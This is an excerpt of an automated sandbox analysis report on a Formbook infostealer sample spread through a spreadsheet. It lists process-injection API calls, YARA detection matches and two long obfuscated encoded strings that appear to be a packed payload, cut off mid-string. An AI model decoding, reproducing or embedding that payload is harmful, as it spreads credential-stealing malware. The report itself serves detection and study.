              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021CF938 NtWriteFile,8_2_021CF938
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021D1930 NtSetContextThread,8_2_021D1930
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021CFE24 NtWriteVirtualMemory,8_2_021CFE24
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021CFEA0 NtReadVirtualMemory,8_2_021CFEA0
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021CFF34 NtQueueApcThread,8_2_021CFF34
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021CFFFC NtCreateProcessEx,8_2_021CFFFC
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021CFC30 NtOpenProcess,8_2_021CFC30
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021CFC48 NtSetInformationFile,8_2_021CFC48
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021D0C40 NtGetContextThread,8_2_021D0C40
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021CFC90 NtUnmapViewOfSection,8_2_021CFC90
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021CFD5C NtEnumerateKey,8_2_021CFD5C
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021D1D80 NtSuspendThread,8_2_021D1D80
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_000D9D60 NtCreateFile,8_2_000D9D60
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_000D9E10 NtReadFile,8_2_000D9E10
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_000D9E90 NtClose,8_2_000D9E90
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_000D9F40 NtAllocateVirtualMemory,8_2_000D9F40
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_000D9D1C NtCreateFile,8_2_000D9D1C
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_000D9D62 NtCreateFile,8_2_000D9D62
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_000D9DB2 NtReadFile,8_2_000D9DB2
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_000D9E0A NtReadFile,8_2_000D9E0A
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003B71884_2_003B7188
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003B43884_2_003B4388
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003B5C804_2_003B5C80
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003B6F604_2_003B6F60
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003B8DA04_2_003B8DA0
              Source: C:\Users\Public\vbc.exeCode function: 4_2_008973A84_2_008973A8
              Source: C:\Users\Public\vbc.exeCode function: 4_2_008965604_2_00896560
              Source: C:\Users\Public\vbc.exeCode function: 4_2_008960084_2_00896008
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00897DB14_2_00897DB1
              Source: C:\Users\Public\vbc.exeCode function: 6_2_004010306_2_00401030
              Source: C:\Users\Public\vbc.exeCode function: 6_2_0041E2126_2_0041E212
              Source: C:\Users\Public\vbc.exeCode function: 6_2_0041D3066_2_0041D306
              Source: C:\Users\Public\vbc.exeCode function: 6_2_00402D906_2_00402D90
              Source: C:\Users\Public\vbc.exeCode function: 6_2_0041E5B76_2_0041E5B7
              Source: C:\Users\Public\vbc.exeCode function: 6_2_0041E5BA6_2_0041E5BA
              Source: C:\Users\Public\vbc.exeCode function: 6_2_00409E406_2_00409E40
              Source: C:\Users\Public\vbc.exeCode function: 6_2_00409E3B6_2_00409E3B
              Source: C:\Users\Public\vbc.exeCode function: 6_2_0041CFA66_2_0041CFA6
              Source: C:\Users\Public\vbc.exeCode function: 6_2_00402FB06_2_00402FB0
              Source: C:\Users\Public\vbc.exeCode function: 6_2_0095E0C66_2_0095E0C6
              Source: C:\Users\Public\vbc.exeCode function: 6_2_0098D0056_2_0098D005
              Source: C:\Users\Public\vbc.exeCode function: 6_2_0097905A6_2_0097905A
              Source: C:\Users\Public\vbc.exeCode function: 6_2_009630406_2_00963040
              Source: C:\Users\Public\vbc.exeCode function: 6_2_0095E2E96_2_0095E2E9
              Source: C:\Users\Public\vbc.exeCode function: 6_2_00A012386_2_00A01238
              Source: C:\Users\Public\vbc.exeCode function: 6_2_00A063BF6_2_00A063BF
              Source: C:\Users\Public\vbc.exeCode function: 6_2_009863DB6_2_009863DB
              Source: C:\Users\Public\vbc.exeCode function: 6_2_0095F3CF6_2_0095F3CF
              Source: C:\Users\Public\vbc.exeCode function: 6_2_009623056_2_00962305
              Source: C:\Users\Public\vbc.exeCode function: 6_2_009673536_2_00967353
              Source: C:\Users\Public\vbc.exeCode function: 6_2_009AA37B6_2_009AA37B
              Source: C:\Users\Public\vbc.exeCode function: 6_2_009954856_2_00995485
              Source: C:\Users\Public\vbc.exeCode function: 6_2_009714896_2_00971489
              Source: C:\Users\Public\vbc.exeCode function: 6_2_0099D47D6_2_0099D47D
              Source: C:\Users\Public\vbc.exeCode function: 6_2_0097C5F06_2_0097C5F0
              Source: C:\Users\Public\vbc.exeCode function: 6_2_0096351F6_2_0096351F
              Source: C:\Users\Public\vbc.exeCode function: 6_2_009A65406_2_009A6540
              Source: C:\Users\Public\vbc.exeCode function: 6_2_009646806_2_00964680
              Source: C:\Users\Public\vbc.exeCode function: 6_2_0096E6C16_2_0096E6C1
              Source: C:\Users\Public\vbc.exeCode function: 6_2_00A026226_2_00A02622
              Source: C:\Users\Public\vbc.exeCode function: 6_2_009AA6346_2_009AA634
              Source: C:\Users\Public\vbc.exeCode function: 6_2_009E579A6_2_009E579A
              Source: C:\Users\Public\vbc.exeCode function: 6_2_0096C7BC6_2_0096C7BC
              Source: C:\Users\Public\vbc.exeCode function: 6_2_009957C36_2_009957C3
              Source: C:\Users\Public\vbc.exeCode function: 6_2_009FF8EE6_2_009FF8EE
              Source: C:\Users\Public\vbc.exeCode function: 6_2_0096C85C6_2_0096C85C
              Source: C:\Users\Public\vbc.exeCode function: 6_2_0098286D6_2_0098286D
              Source: C:\Users\Public\vbc.exeCode function: 6_2_009629B26_2_009629B2
              Source: C:\Users\Public\vbc.exeCode function: 6_2_00A0098E6_2_00A0098E
              Source: C:\Users\Public\vbc.exeCode function: 6_2_009769FE6_2_009769FE
              Source: C:\Users\Public\vbc.exeCode function: 6_2_009E59556_2_009E5955
              Source: C:\Users\Public\vbc.exeCode function: 6_2_00A13A836_2_00A13A83
              Source: C:\Users\Public\vbc.exeCode function: 6_2_00A0CBA46_2_00A0CBA4
              Source: C:\Users\Public\vbc.exeCode function: 6_2_0095FBD76_2_0095FBD7
              Source: C:\Users\Public\vbc.exeCode function: 6_2_009EDBDA6_2_009EDBDA
              Source: C:\Users\Public\vbc.exeCode function: 6_2_00987B006_2_00987B00
              Source: C:\Users\Public\vbc.exeCode function: 6_2_009FFDDD6_2_009FFDDD
              Source: C:\Users\Public\vbc.exeCode function: 6_2_00990D3B6_2_00990D3B
              Source: C:\Users\Public\vbc.exeCode function: 6_2_0096CD5B6_2_0096CD5B
              Source: C:\Users\Public\vbc.exeCode function: 6_2_00992E2F6_2_00992E2F
              Source: C:\Users\Public\vbc.exeCode function: 6_2_0097EE4C6_2_0097EE4C
              Source: C:\Users\Public\vbc.exeCode function: 6_2_009FCFB16_2_009FCFB1
              Source: C:\Users\Public\vbc.exeCode function: 6_2_00970F3F6_2_00970F3F
              Source: C:\Users\Public\vbc.exeCode function: 6_2_0098DF7C6_2_0098DF7C
              Source: C:\Users\Public\vbc.exeCode function: 6_2_003D98626_2_003D9862
              Source: C:\Users\Public\vbc.exeCode function: 6_2_003D10726_2_003D1072
              Source: C:\Users\Public\vbc.exeCode function: 6_2_003D10696_2_003D1069
              Source: C:\Users\Public\vbc.exeCode function: 6_2_003D81326_2_003D8132
              Source: C:\Users\Public\vbc.exeCode function: 6_2_003DAA326_2_003DAA32
              Source: C:\Users\Public\vbc.exeCode function: 6_2_003DDA6F6_2_003DDA6F
              Source: C:\Users\Public\vbc.exeCode function: 6_2_003D5B226_2_003D5B22
              Source: C:\Users\Public\vbc.exeCode function: 6_2_003D5B1F6_2_003D5B1F
              Source: C:\Users\Public\vbc.exeCode function: 6_2_003DDB0E6_2_003DDB0E
              Source: C:\Users\Public\vbc.exeCode function: 6_2_003D2CF26_2_003D2CF2
              Source: C:\Users\Public\vbc.exeCode function: 6_2_003D2CEC6_2_003D2CEC
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_022812388_2_02281238
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021DE2E98_2_021DE2E9
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021E23058_2_021E2305
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021E73538_2_021E7353
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0222A37B8_2_0222A37B
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021DF3CF8_2_021DF3CF
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_022063DB8_2_022063DB
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0220D0058_2_0220D005
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021F905A8_2_021F905A
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021E30408_2_021E3040
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021DE0C68_2_021DE0C6
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_022826228_2_02282622
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021E46808_2_021E4680
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021EE6C18_2_021EE6C1
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021EC7BC8_2_021EC7BC
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0226579A8_2_0226579A
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_022157C38_2_022157C3
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0221D47D8_2_0221D47D
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021F14898_2_021F1489
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_022154858_2_02215485
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021E351F8_2_021E351F
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_022265408_2_02226540
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021FC5F08_2_021FC5F0
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02293A838_2_02293A83
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02207B008_2_02207B00
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0228CBA48_2_0228CBA4
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021DFBD78_2_021DFBD7
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0226DBDA8_2_0226DBDA
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021EC85C8_2_021EC85C
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0220286D8_2_0220286D
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0227F8EE8_2_0227F8EE
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_022659558_2_02265955
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0228098E8_2_0228098E
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021E29B28_2_021E29B2
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021F69FE8_2_021F69FE
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02212E2F8_2_02212E2F
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021FEE4C8_2_021FEE4C
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021F0F3F8_2_021F0F3F
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0220DF7C8_2_0220DF7C
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02210D3B8_2_02210D3B
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021ECD5B8_2_021ECD5B
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0227FDDD8_2_0227FDDD
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_000DE2128_2_000DE212
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_000DD3068_2_000DD306
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_000DE5BA8_2_000DE5BA
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_000C2D908_2_000C2D90
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_000C9E3B8_2_000C9E3B
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_000C9E408_2_000C9E40
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_000DCFA68_2_000DCFA6
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_000C2FB08_2_000C2FB0
              Source: Booking.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 021DE2A8 appears 38 times
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 021DDF5C appears 113 times
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 0222373B appears 238 times
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 02223F92 appears 108 times
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 0224F970 appears 81 times
              Source: C:\Users\Public\vbc.exeCode function: String function: 0095E2A8 appears 38 times
              Source: C:\Users\Public\vbc.exeCode function: String function: 0095DF5C appears 119 times
              Source: C:\Users\Public\vbc.exeCode function: String function: 009CF970 appears 81 times
              Source: C:\Users\Public\vbc.exeCode function: String function: 009A3F92 appears 132 times
              Source: C:\Users\Public\vbc.exeCode function: String function: 009A373B appears 238 times
              Source: 00000006.00000002.2216127314.0000000000240000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000006.00000002.2216127314.0000000000240000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000006.00000002.2218086639.0000000000590000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000006.00000002.2218086639.0000000000590000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000004.00000002.2181972415.0000000003309000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000004.00000002.2181972415.0000000003309000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000008.00000002.2380061864.0000000000480000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000008.00000002.2380061864.0000000000480000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000006.00000002.2216903843.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000006.00000002.2216903843.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000008.00000002.2380005232.0000000000360000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000008.00000002.2380005232.0000000000360000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000008.00000002.2379844728.00000000000C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000008.00000002.2379844728.00000000000C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 4.2.vbc.exe.3453630.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 4.2.vbc.exe.3453630.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 4.2.vbc.exe.34a8450.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 4.2.vbc.exe.34a8450.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: svchost[1].2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: svchost[1].2.dr, frmRazor.csBase64 encoded string: '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
              Source: 4.2.vbc.exe.cf0000.2.unpack, frmRazor.csBase64 encoded string: 'GIdDNNZNNNNRNNNN//8NNYtNNNNNNNNNDNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNtNNNNN4sht4NgNaAVotOGZ0uITucplOjpz9apzSgVTAuoz5iqPOvMFOlqJ4tnJ4tER9GVT1iMTHhQD0XWNNNNNNNNNODEDNNGNRQNViu868NNNNNNNNNNBNNNvRYNINNNPNNNNNTNNNNNNNNlw8NNNNtNNNNDNNNNNNNRDNtNNNNNtNNONNNNNNNNNNRNNNNNNNNNNPNNNNNNtNNNNNNNNZNDVHNNONNNONNNNNNRNNNRNNNNNNNNONNNNNNNNNNNNNNNUt/NNOCNNNNNRNNNBDQNNNNNNNNNNNNNNNNNNNNNNNNNTNNNNjNNNOpCjNNUNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNVNNNPNNNNNNNNNNNNNNNPPNNNRtNNNNNNNNNNNNNNP50MKu0NNNN0O8NNNNtNNNNVNNNNNVNNNNNNNNNNNNNNNNNNPNNNTNhpaAlLjNNNBDQNNNNDNNNNNDNNNNvNNNNNNNNNNNNNNNNNNONNNONYaWyoT9wNNNZNNNNNTNNNNNPNNNNWtNNNNNNNNNNNNNNNNNNDNNNDtNNNNNNNNNNNNNNNNNNNNPfCjNNNNNNNRtNNNNPNNHNhPHNNBjLNNNQNNNNNNNNNXD+NNP4NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNO4PXOLNNNbdWtNPXOpNNNbNXdMmTNNNPbNONNNRpkxNNNdNNtNNOUZnNNNXtNZNNNEmTjNNPbNRNNNRXuZjNDNDNNNNNDNNRDO+NDNNOT8pNNNXPvfNOvbG